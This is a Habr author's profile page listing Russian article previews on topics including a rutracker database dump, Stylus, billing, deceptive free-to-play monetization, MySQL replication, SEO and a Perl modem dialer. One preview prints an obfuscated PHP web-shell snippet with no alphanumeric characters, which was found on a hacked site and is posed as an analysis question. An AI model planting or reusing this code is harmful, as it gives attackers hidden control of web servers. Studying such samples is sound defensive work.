Pull to refresh
18
0
Максим @MistaTwista

Разрабатываю, что еще не разработано

Send message

Спасем крупнейшую медиатеку в рунете. Вся база rutracker у Вас на компьютере

Reading time10 min
Views194K
image

В контексте последних законов, событий и тенденций как никогда очевидна ценность рутрекера как базы данных различного контента, а не как конкретного ресурса. К сожалению все мои призывы к администрации рутрекера предоставить общедоступный, полный, удобный дамп их базы наткнулся на полное непонимание с их стороны. Выкладывать нечто, что они называют зашифрованной «базой» — я не считаю решением проблемы по причинам, изложенным в вышеприведенных ветках обсуждения и продублированным ниже.

К сожалению, решить проблему своими силами у меня не хватило ни времени, ни, будем откровенны, знаний. Но, к счастью, мои слова возымели действие на людей, которые и тем и другим обладают. В итоге эти люди организовались и сообща сделали то, о чём так долго говорили большевики о чем я писал, а именно с помощью скриптов обошли рутрекер, сдампили все описания раздач с хешами, распарсили их и скомпоновали в удобную для употребления базу. В дополнение к этому так же была написана «морда»: программа для удобной работы с базой конечных пользователей, не знающих с какого конца держат grep. К сожалению, аккаунта на хабре никто из этой команды не имеет (если не считать read-only), в песочнице статья могла бы потеряться, поэтому меня выбрали как рупор для данной площадки. Я, честно говоря, раздумывал совсем недолго и только над тем, как правильнее все сделать. Если будут какие-то вопросы — задавайте мне в комментах, я либо отвечу сам, либо переадресую разработчикам. Технические тексты от первого лица, но я имею к ним косвенное отношение, они оставлены в таком виде для простоты восприятия.

Прежде, чем перейти к технической части и ссылкам, хотел бы добавить, что весь смысл этой затеи в том, чтобы как можно больше людей сохранили эту базу к себе. Поэтому очень Вас прошу, скачать данные по ссылкам ниже (желательно использовать торрент) и оставаться на раздаче как можно дольше. Скорее всего в будущем база будет обновляться, но этот момент еще не продуман до конца.

Техническая часть, ссылки и немного лирики
Total votes 290: ↑274 and ↓16+258
Comments257

Почему мы стали использовать препроцессор Stylus в Яндекс.Почте, а также о библиотеке, помогающей жить с IE

Reading time10 min
Views88K
imageСегодня я хочу рассказать о том, почему и как мы пришли к использованию препроцессора Stylus в разработке Яндекс.Почты, а также описать используемый нами метод работы со стилями для IE. Он очень легко реализуется именно с помощью препроцессоров и делает поддержку IE простой и удобной. Мы разработали для этого специальную библиотеку, которой тоже поделимся — if-ie.styl.

Это только первая статья из серии статей об использовании препроцессора Stylus в Яндекс.Почте, которые мы готовим к публикации.

Читать дальше →
Total votes 98: ↑92 and ↓6+86
Comments37

Rainyday.js

Reading time1 min
Views36K
image

Для всех, кому прохладного дождя за окном в эти дни мало, Marek Brodziak сделал забавное демо на js + canvas (демо #1, демо #2 — и сразу предупреждаю, что заработать может не во всех браузерах), которое имитирует капли дождя на стекле. Своей целью разработчик ставил добиться лучшей плавности анимации капель.

Для достижения наилучшего эффекта погружения смотреть демо рекомендуется предварительно открыв в соседней вкладке raining.fm.
Читать дальше →
Total votes 103: ↑100 and ↓3+97
Comments62

Биллинг в большом проекте

Reading time8 min
Views48K
Существуют разные способы «монетизировать» проект. Но у них есть одна общая составляющая ― то, как деньги переходят из кошелька пользователя на счет организации. Сегодня мы расскажем о том, как организован прием платежей в Badoo и что можно встретить на рынке платежных шлюзов. Сразу предупреждаем, что в статье вы не найдете конкретных цифр по обороту средств компании, но все остальное будет не менее интересно.

Что такое «биллинг»


Для нас биллинг ― это всё, что связано с получением денег от пользователей: конфигурация цен, страница приема платежей, непосредственно прием и обработка платежей, оказание оплаченных услуг, различные промоакции и, конечно же, мониторинг всего вышеописанного.
Читать дальше →
Total votes 83: ↑78 and ↓5+73
Comments52

Фракталы в простых числах

Reading time3 min
Views154K


Я обнаружил этот фрактал, когда разглядывал интерференцию волн на поверхности речки. Волна движется к берегу, отражается и накладывается сама на себя. Есть ли порядок в тех узорах, которые создаются волнами? Попробуем найти его. Рассмотрим не всю волну, а только вектор ее движения. «Берега» сделаем гладкими, для простоты эксперимента.

Эксперимент можно провести на обычном листке в клеточку из школьной тетради.
Читать дальше →
Total votes 190: ↑183 and ↓7+176
Comments33

Пять проблем при разработке мобильных free-to-play игр

Reading time8 min
Views22K
Не секрет, что в последнее время кроссплатформенные мобильные free-to-play игры стали основным направлением деятельности большого числа игровых компаний. В этой статье мы не будем говорить ни о причинах, которые к этому привели, ни о перспективах данного направления. Компании изменили свои бизнес-модели, начертили схемы монетизации и игровых циклов, помолились на SCRUM и Agile, однако в статье речь пойдет и не про это. Игры по-прежнему нужно делать качественно, нужно правильно выбирать технологии, нужно понимать, что ждать от загадочного free-to-play и с чем придется столкнуться. В этой статье мы рассмотрим 5 наиболее важных технологических проблем, возникающих при создании кроссплатформенных мобильных free-to-play игр.
Читать дальше →
Total votes 31: ↑25 and ↓6+19
Comments12

Мошеннические методы монетизации в free-to-play играх

Reading time11 min
Views136K
Примечание переводчика: После публикации статьи с автором связался коммерческий директор из King.com, создателя Candy Crush Saga, и прояснил несколько моментов, после чего автор добавил пару замечаний. Добавленные абзацы отмечены курсивом.

Принудительная монетизация


Модель принудительной монетизации основывается на уловках, с помощью которых можно заставить человека совершить покупку с неполной информацией, или сокрытии этой информации так, что технически она остаётся доступной, но мозг потребителя не улавливает эту информацию. Сокрытие покупки может быть осуществлено с помощью простой маскировки связи между действием и ценой, как я писал в статье Системы контроля в F2P.

Согласно исследованиям, добавление даже одной промежуточной валюты между потребителем и реальными деньгами, например «игровых самоцветов» (премиальная валюта), делает потребителя гораздо менее подготовленными к оценке стоимости сделки. Лишние промежуточные предметы, я называю их «наслоения», делают для мозга оценку ситуации очень сложной, особенно под напряжением.

Этот дополнительный стресс часто подаётся в форме того, что Роджер Дики из Zynga называет «весёлыми мучениями». Приём заключается в том, чтобы поставить потребителя в очень неудобное или неприятное положение в игре, а потом предложить ему убрать эти «мучения» в обмен на деньги. Эти деньги всегда замаскированы в слоях принудительной монетизации, поскольку потребитель, столкнувшийся с «реальной» покупкой, скорее всего не поведётся на трюк.
Читать дальше →
Total votes 138: ↑131 and ↓7+124
Comments76

Игровая механика: давайте разберём ядро игры по косточкам

Reading time11 min
Views114K
Термин «игровая механика» имеет много значений, но сегодня я буду говорить об игровой механике как об абстракции, определяющей состояние игры. Очень упрощённо это выглядит вот так:



Есть только два фактора, которые определяют любое текущее состояние игры: механика (правила) и игроки своими действиями.

Уровень ядра


Такт 1: определение состояния
Всегда есть некое текущее состояние системы (например, начало хода). Оно определяется на первом такте инициализирующей последовательностью, когда игроки «загружают» игру, раскладывая поле, выбирая фишки, распределяя начальные ресурсы и так далее. Затем оно меняется в зависимости от происходящего в игре.
Читать дальше →
Total votes 60: ↑56 and ↓4+52
Comments18

Как находить и устранять утечки памяти на примере Яндекс.Почты

Reading time8 min
Views66K
На первый поверхностный взгляд, слова JavaScript и «утечка памяти» рядом стоять не могут. Настоящих утечек памяти в JS, конечно, не может быть, потому что процесс сборки мусора происходит автоматически и не может контролироваться из нашего кода. Выделить память под объект и забыть освободить невозможно. Но могут быть ситуации, связанные с ошибками в логике работы приложения, которые приводят к утечкам памяти другого рода. Например, забиндили обработчик, в котором что-то делаем с методами общего объекта и забыли его анбиндить. Или же посылаем письмо с большим телом и не очищаем тело даже после отправки.

image

Мы в Яндекс.Почте, сложном и массовом проекте, накопили заметный опыт в поиске и устранении таких утечек, и хотим им поделиться.
Итак, больше подробностей
Total votes 147: ↑143 and ↓4+139
Comments13

Как измерить релевантность контента

Reading time10 min
Views11K
Оценка контента одна из главных составляющих формулы релевантности. Знание текстовых признаков и вклад каждого из них в оценку сайта позволит приблизиться к более профессиональной работе с ресурсом. В данной статье будет рассмотрена модель, позволяющая восстановить формулу ранжирования по каждому конкретному запросу, указана значимость определение тематики сайта при продвижении по определенному запросу, а также проработан вопрос, связанного с определением неестественного текста.

Восстановление формулы ранжирования

Если переводить данную задачу в область математики, то входные данные можно представить набором векторов, где каждый вектор – множество характеристик каждого сайта, а координаты в векторе – параметр, по которым оценивается сайт. В описанном векторном пространстве обязательно должна быть задана функция, определяющая отношение порядка двух объектов между собой. Эта функция позволяет ранжировать объекты между собой по принципу «больше — меньше», однако при этом сказать, насколько именно одно больше или меньше другого – нельзя. Такого вида задачи относятся к задачам оценки порядковой регрессии.
Наши сотрудники разработали алгоритм на основе модели линейной регрессии с регулируемой селективностью, который позволил с определенной долей погрешности восстановить ранги сайтов и спрогнозировать изменение выдачи при соответствующих корректировках параметров сайта. Первым шагом алгоритма является обучение модели. В данном случае обучающая выборка представляет собой результаты ранжирования сайтов в рамках одного поискового запроса. Упорядоченность сайтов в рамках поискового запроса фактически означает, что в признаковом пространстве существует некоторое направление, на которое объекты обучающей выборки должны проектироваться в нужном порядке. Это направление и является искомым в задаче восстановления формулы ранжирования. Однако судя по рис.1, таких направлений может быть много.
image
Рис. 1. Выбор направляющего вектора

Для решения данного вопроса был рассмотрен подход, лежащий в основе метода опорных точек, а именно – выбор такого направления, которое будет обеспечивать максимальное удаление объектов друг от друга.
Следующая задача, которая была решена — выбор стратегии обучения. Рассматривалось два варианта – сокращенная стратегия обучения, при которой учитывается порядок двух соответствующих элементов, и полная стратегия, которая учитывает весь порядок объектов. В результате экспериментов была выбрана сокращенная стратегия, которая заключается в решении следующего уравнения:(1)
image, где image — решение стандартной задачи квадратичного программирования при линейных ограничениях: image, где
image — симметричная матрица
image — вектор коэффициента
image — разница векторов характеристик

Данный подход на различных выборках (100 признаков и 500 признаков на 20 различных множествах поисковых запросов) показал хорошие результаты (см. табл. 1).

Читать далее
Total votes 16: ↑14 and ↓2+12
Comments4

Ретенция, или почему пользователь вернется в игру? Продолжение

Reading time12 min
Views33K
Привет, Хабр!

Это продолжение первой части статьи о том, какие существуют инструменты влияния на ретенцию (retention) игры. Напомню также, что понятие «ретенция» в большей мере применимо к активной фазе работы и развития социальной или мобильной игры. Вряд ли эти же механизмы применимы к случаям, когда мы перепроходим игры, в которые играли 5 лет назад.

В предыдущей части мы рассмотрели набор инструментов влияния на ретенцию, среди которых было введение персонажей и сюжетной составляющей, рейтинги, взаимодействие с друзьями и так далее. Пора увеличить этот список!
Читать дальше →
Total votes 77: ↑73 and ↓4+69
Comments50

Mysql Отложенная репликация или Коммивояжеры с Mysql-slave

Reading time3 min
Views10K
Недавно мне поставили такую задачу: Есть много коммивояжеров с ноутбуками которые разъезжают по стране и что-то кому-то впаривают продают.
Т.к. им нужны актуальные данные о наличии товара и ценах, время от времени они подключаются к центральному серверу через интернет и сливают себе обновленные данные.

Условия к задаче:
— Частота и периодичность выхода на связь коммивояжеров неизвестна, ровно как и длительность.
— Должно все работать максимально надежно, потому как коммивояжеры они такие «коммивояжеры».
— Решение должно быть на базе Mysql master-slave replication.

Выводы из условия:

— Для надежности, на стороне клиента(slave) минимум настроек, никаких скриптов по крону, все должно быть внутри mysql.
— Т.к. неизвестно когда и с какой периодичностью будут подключаться к master базе коммивояжеры, binlog на мастере нужно хранить так долго пока все slave не скачают его себе.

Решение:
— Информировать мастер, какие slave и сколько уже «скачали». А точнее в какой позиции самый «ленивый» slave.
— Все остальные binlog можно смело удалять.

А теперь в картинках...
Total votes 33: ↑31 and ↓2+29
Comments7

Принцип цикады и почему он важен для веб-дизайнеров

Reading time6 min
Views231K
Пару лет назад я прочитал интересные факты о жизненном цикле периодических цикад. Обычно мы не видим вокруг себя много этих насекомых, потому что бóльшую часть своей жизни они проводят под землёй и тихо сосут корни растений.

Однако, в зависимости от вида, каждые 7, 11, 13 или 17 лет периодические цикады одновременно массово вылезают на свет и превращаются в шумных летающих тварей, спариваются и вскоре умирают.

Хотя наши странные цикады весело уходят в иной мир, возникает очевидный вопрос: это просто случайность, или числа 7, 11, 13 и 17 какие-то особенные?
Читать дальше →
Total votes 696: ↑682 and ↓14+668
Comments119

А много ли дроны дают молока? Приёмы обратной разработки в звуковом дизайне

Reading time7 min
Views32K
Статья является попыткой разобраться, можно ли передавать опыт обратной разработки в звуковом дизайне средствами выразительности русского языка.

Как-то раз, читая музыкальные форумы, я наткнулся на тему с обсуждением саунд дизайна в фильме Обливион. Людей интересовал процесс создания звуков дронов. Так как ответов по существу, спустя несколько недель, в той теме так и не появилось, а в официальном видео была одна вода, я решил попробовать найти ответ самостоятельно, применив методы обратной разработки.

В качестве референса была выбрана первая сцена с участием дрона (на 12-й минуте фильма), с которой можно ознакомиться на Ютюбе. После нескольких часов работы я смог получить следующий результат:


Если вам ещё интересно, прошу под кат. Трафик!
Total votes 106: ↑103 and ↓3+100
Comments12

Как продвигать новый сайт?

Reading time4 min
Views66K
Если вы не SEO-профи, то в большинстве случаев вам нужно научиться привлекать посетителей на именно «новорожденный» сайт — на ваш собственный веб-сервис, интернет-магазин, сайт вашей компании. Ничего сложного в этом нет, однако нужно правильно выстроить стратегию с учетом подводных камней.

Читать дальше →
Total votes 10: ↑3 and ↓7-4
Comments4

SEO для интернет-магазинов

Reading time6 min
Views74K
Интернет-магазин, который не использует SEO — нонсенс, и вряд ли вообще найдутся примеры успешных проектов, не использующих этот канал привлечения клиентов.

Трафик должен быть большим, целевым и максимально дешевым. Грамотная стратегия поискового продвижения гарантирует минимальную цену посетителя.

В битве за клиента каждый крупный интернет-магазин старается нанять «гуру» поискового маркетинга.

В битве за клиенты каждый крупный интернет-магазин старается нанять «гуру» поискового маркетинга. Уровень зарплат людей с реальными достижениями в этой сфере очень высок. Если бюджет продвижения — n миллионов рублей в месяц, лучше сразу нанять дорогого и опытного человека, нежели позволять новичку выбросить несколько этих самых миллионов на получение опыта. Однако SEO — не rocket science, а комплекс стандартных приемов, которые может научиться применять на практике любой нормальный человек. Продвигать OZON сложно, продвигать небольшой интернет-магазин — достаточно просто, особенно используя правильные инструменты.

В этой статье мы не будем подробно описывать выделение бюджета, определение целевой аудитории, вычисление максимально выгодной цены клика, системы аналитики и т.п. маркетинговые моменты, а постараемся сосредоточиться на технических аспектах SEO для e-commerce.

Особенности

Т.к. интернет-магазин обычно предлагает широкий ассортимент товаров, упор в продвижении удобно и выгодно делать на сбор трафика с низкочастотных ключевых словосочетаний.

Пример: если выйти в десятку «Яндекса» по запросу «утюги», можно получать 1000 переходов и 15 покупок. Если примерно за те же деньги стоять в топе по сотне более специфических и дешевых в продвижении запросов типа «утюг Tefal fv5378», можно получать 5000 переходов и 50 покупок. Цифры условные, но логика понятна.

Читать дальше →
Total votes 14: ↑11 and ↓3+8
Comments5

Смешивание текстур ландшафта

Reading time3 min
Views90K


В данной статье я расскажу об алгоритме смешивания текстур, который позволяет привести внешний вид ландшафта ближе к естественному. Этот алгоритм легко может быть использован как в шейдерах 3D игр, так и в 2D играх.

Статья рассчитана на начинающих разработчиков игр.
Читать дальше →
Total votes 243: ↑237 and ↓6+231
Comments27

PHP-шелл без единого буквенно-цифрового символа

Reading time1 min
Views89K
Вчера в блоге компании Sucuri появился любопытный вопрос: некий владелец сайта, обнаружив его взломанным, был немало удивлён, обнаружив следующий злонамеренный код; что именно он делает?
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

Как видно, в коде нет ни вызовов функций, ни вообще какого-либо буквенно-цифрового символа.
Узнать подробности
Total votes 119: ↑105 and ↓14+91
Comments33

Как ускорить загрузку своего сайта при помощи compress.php, который объединит и сожмёт JS + CSS в Gzip

Reading time3 min
Views61K
Ускоряем сайт при помощи GoogleПодробные инструкции, которые даются на code.google позволят вам:

  • Сжать все многочисленные скрипты JS и стили CSS
  • Соединить все полученные файлы в один JS и в один CSS
  • Сжать полученные два файла в формат GZIP, который понимают почти все браузеры и умеют распаковывать на лету
  • Прописать такой .htaccess, который заставляет браузеры кэшировать данные два файла

Всё это будет происходить при запуске единственного скрипта compress.php

Для примера, результат сжатия скриптов моего сайта:
  • JS: сжато в gzip 26 698 B, сжато без gzip 95 796 B, было 120 147 B
  • CSS: сжато в gzip 46 049 B, сжато без gzip 160 001 B, было 281 870 B

Получается, что экономия трафика составляет 329 270 B. Но основной выигрыш для скорости загрузки в том, что теперь загружается не 14 файлов, а всего 2 (а это намного быстрее, так как браузер не тратит время на запросы). Причём делается это один раз, а не динамически силами самого сервера (тем более, что не все сервера поддерживают подобное конфигурирование сжатия для экономии ресурсов процессора).

В итоге, получится:
<link rel="stylesheet" type="text/css" href="min/styles_1349888114.cssgz" />
<script src="min/all_1349888114.jsgz" /></script>

Читать дальше →
Total votes 52: ↑38 and ↓14+24
Comments50

perl скрипт производящий голосовой обзвон (оповещение) через usb модем huawei e1550

Reading time17 min
Views42K
В свое время, так как я много времени проводил в командировках, мной была приобретена замечательная игрушка — usb модем Huawei e1550. Но времена лихой молодости прошли, и необходимость в использовании данного девайса по прямому назначению отпала. Так он и пылился у меня на полке в течении нескольких лет. И пылился бы и дальше, но возникла задача сделать систему оповещения. Тут я и вспомнил про модем. Рассмотрев поставленную задачу — был вынужден отказаться от SMS оповещения в пользу голосового дозвона по причине невозможности получить уведомление о прочтении SMS. Решения на базе Asterisk показались мне несколько громоздкими, и почитав доку по модему я решил написать звонилку самостоятельно.

Причина публикации.

Несмотря на обилие статей по работе с USSD и SMS запросами, я не нашел ни одной реализации голосовых вызовов на скриптовых языках (таких как Perl, PHP, Node.js). Надеюсь данная статья будет для Вас хорошим подспорьем.
Читать дальше →
Total votes 60: ↑56 and ↓4+52
Comments19

Information

Rating
Does not participate
Location
Санкт-Петербург, Санкт-Петербург и область, Россия
Date of birth
Registered
Activity

Specialization

Backend Developer
Lead
Golang
High-loaded systems
Node.js
Software development